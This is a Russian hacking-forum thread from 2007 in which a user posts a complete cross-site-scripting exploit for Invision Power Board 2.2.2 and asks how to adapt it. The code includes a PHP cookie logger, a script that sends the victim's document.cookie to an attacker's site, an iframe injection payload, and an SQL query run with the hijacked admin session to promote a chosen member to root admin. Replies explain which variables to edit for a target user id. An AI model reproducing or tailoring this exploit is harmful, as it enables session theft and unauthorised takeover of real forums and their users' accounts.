Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
Вопрос ламмера по сплойту Ipb222 |
14.08.2007, 00:14
|
|
Участник форума
Регистрация: 19.12.2006
Сообщений: 159
Провел на форуме:
896935
Репутация:
64
|
|
Вопрос ламмера по сплойту Ipb222
Invision Power Board 2.2.2 Cross Site Scripting vulnerability
Код:
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
#
# Invision Power Board 2.2.2 Cross Site Scripting vulnerability
#
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# Vendor site: http://www.invisionboard.com/
# Vulnerability found by Iron (ironwarez.info)
#
# Greets to all **** Security Group members
#
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# The vulnerability:
# Open up any php file in /jscripts/folder_rte_files
# See:
var editor_id = <?php print '"'.trim($_REQUEST['editorid']).'";'; ?>
#
# $_REQUEST['editorid'] isn't sanitized in any way, so allows
# other uses to execute their own code.
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# PoC (Log cookies & run SQL query)
#
# Requirements: server supporting PHP, user account on
# target forum, database prefix needs to be known.
#
# Create a file called name.php on your webserver and put this code in it:
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
<?php
$target = "http://www.yourtarget.com/forum"; #Target forum without trailing slash
$prefix = "ibf_"; #Database prefix, default: ibf_
$member = 22; #Member id to promote
$newgroup = 4; # The id of the new group to promote, normally 4 is root admin
$ip = $_SERVER['REMOTE_ADDR'];
$referer = $_SERVER['HTTP_REFERER'];
$agent = $_SERVER['HTTP_USER_AGENT'];
$data = $_GET['c'];
$time = date("Y-m-d G:i:s A");
$text = "Time: ".$time."\nIP:".$ip."\nReferer:".$referer."\nUser-Agent:".$agent."\nCookie:".$data."\n\n";
$file = fopen('log.txt' , 'a');
fwrite($file,$text);
fclose($file);
if(preg_match("/ipb_admin_session_id=([0-9a-z]{32});/",$data,$stuff))
{
print '<img width=0 height=0 src="'.$target.'/admin/index.php?adsess='.$stuff[1].'&act=sql&code=runsql§ion=admin&query=UPDATE+
'.$prefix.'members+SET
+mgroup+%3D+%27'.$newgroup.'%27+WHERE+id+%3D+%27'. $member.'%27&st="></>';
}
?>
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# Also create a file in the same directory named "log.txt" and chmod it 777
#
# Now, create a file called script.js on your webserver, put this code in it:
#
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
document.location="http://www.yourownsite.com/path/to/file/name.php?c="+document.cookie;
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
#
# And, last but not least, create a file that combines those two;)
# Name it blah.html and put this code in it:
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
<iframe border=0 src="http://www.targetforum.com/forum_folder/jscripts/folder_rte_files/module_table.php?editorid=//--></
script><script src=http://www.yourownsite.com/path/to/file/script.js>" width=0 height=0></iframe>
Насколько я понял, этим сплойтом можно выполнять скуль команды, при просмотре страницы жертвой.
Так-вот я хотел-бы узнать как тут изменить скуль команду, чтоб изменить группу юзера(id=1483) с 3 на 4.
Спасибо |
|
|
14.08.2007, 00:16
|
|
Постоянный
Регистрация: 10.11.2006
Сообщений: 416
Провел на форуме:
5636868
Репутация:
849
|
|
Это xss сплоит ) придется ссылки пихать жертве. Просто поднимает пользователя по определенного указанного уровня (1 - админ)
До кучи надо создавать на хостинге php файлы
|
|
|
|
14.08.2007, 00:20
|
|
Участник форума
Регистрация: 19.12.2006
Сообщений: 159
Провел на форуме:
896935
Репутация:
64
|
|
Сообщение от Basurman
Это xss сплоит ) придется ссылки пихать жертве.
Я это все понял, у меня вопрос другой
PHP код:
<?php
$target = "http://www.yourtarget.com/forum"; #Target forum without trailing slash
$prefix = "ibf_"; #Database prefix, default: ibf_
$member = 22; #Member id to promote
$newgroup = 4; # The id of the new group to promote, normally 4 is root admin
$ip = $_SERVER['REMOTE_ADDR'];
$referer = $_SERVER['HTTP_REFERER'];
$agent = $_SERVER['HTTP_USER_AGENT'];
$data = $_GET['c'];
$time = date("Y-m-d G:i:s A");
$text = "Time: ".$time."\nIP:".$ip."\nReferer:".$referer."\nUser-Agent:".$agent."\nCookie:".$data."\n\n";
$file = fopen('log.txt' , 'a');
fwrite($file,$text);
fclose($file);
if(preg_match("/ipb_admin_session_id=([0-9a-z]{32});/",$data,$stuff))
{
print '<img width=0 height=0 src="'.$target.'/admin/index.php?adsess='.$stuff[1].'&act=sql&code=runsql§ion=admin&query=UPDATE+
'.$prefix.'members+SET
+mgroup+%3D+%27'.$newgroup.'%27+WHERE+id+%3D+%27'. $member.'%27&st="></>';
}
?>
как вот это чудо отредактировать
Просто поднимает пользователя по определенного указанного уровня (1 - админ)
А вот тут я чето неврубился у админов группа вроде 4
Последний раз редактировалось FaR-G9; 14.08.2007 в 00:23..
|
|
|
|
14.08.2007, 00:29
|
|
Познавший АНТИЧАТ
Регистрация: 02.06.2006
Сообщений: 1,188
Провел на форуме:
6023777
Репутация:
2642
|
|
PHP код:
$target = "http://www.yourtarget.com/forum"; #Target forum without trailing slash
$prefix = "ibf_"; #Database prefix, default: ibf_
$member = 22; #Member id to promote
Просто эти строки редактируй.
$target - урл форума
$prefix - префикс форума (если знаешь) - стандартный "ibf_"
$member - твой id на форуме ( вроди бы  ) |
|
|
|
14.08.2007, 00:30
|
|
Постоянный
Регистрация: 10.11.2006
Сообщений: 416
Провел на форуме:
5636868
Репутация:
849
|
|
не суть важно. пусть будет 4
$member = 1483;
$newgroup =4; это можно оставить
|
|
|
|
14.08.2007, 00:32
|
|
Участник форума
Регистрация: 19.12.2006
Сообщений: 159
Провел на форуме:
896935
Репутация:
64
|
|
Сори
Млин, ступил там он так и настроен
|
|
|
|
14.08.2007, 00:40
|
|
Познавший АНТИЧАТ
Регистрация: 02.06.2006
Сообщений: 1,188
Провел на форуме:
6023777
Репутация:
2642
|
|
Сообщение от FaR-G9
Сори
Млин, ступил там он так и настроен
А это для чего скрипт?
|
|
|
|
14.08.2007, 00:43
|
|
Постоянный
Регистрация: 10.11.2006
Сообщений: 416
Провел на форуме:
5636868
Репутация:
849
|
|
Ломать Invision Power Board 2.2.2
Скрипт получает админскую сессию через XSS |
|
|
|
14.08.2007, 00:44
|
|
Участник форума
Регистрация: 19.12.2006
Сообщений: 159
Провел на форуме:
896935
Репутация:
64
|
|
Сообщение от NOmeR1
А это для чего скрипт?
Чтоб изменить группу юзера
Скрипт получает админскую сессию через XSS
А кроме этого еще выполняет Скуль команду
Последний раз редактировалось FaR-G9; 14.08.2007 в 00:48..
|
|
|
|
14.08.2007, 00:49
|
|
Постоянный
Регистрация: 10.11.2006
Сообщений: 416
Провел на форуме:
5636868
Репутация:
849
|
|
Это можно и вручную сделать
Чисто технически это можно назвать снифером |
|
|
|
|
|
|
Похожие темы
|
| Тема |
Автор |
Раздел |
Ответов |
Последнее сообщение |
|
Proxy FAQ
|
foreva |
Чужие Статьи |
12 |
04.01.2008 12:15 |
|
ЕсТь ВоПрос
|
Guma |
Чаты |
4 |
26.10.2005 21:48 |
|
ВОПРОС ЗНАТОКАМ
|
Hrust |
Болталка |
12 |
23.01.2005 19:31 |
|
Вопрос...
|
Black_Death |
Болталка |
1 |
05.01.2005 04:56 |
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
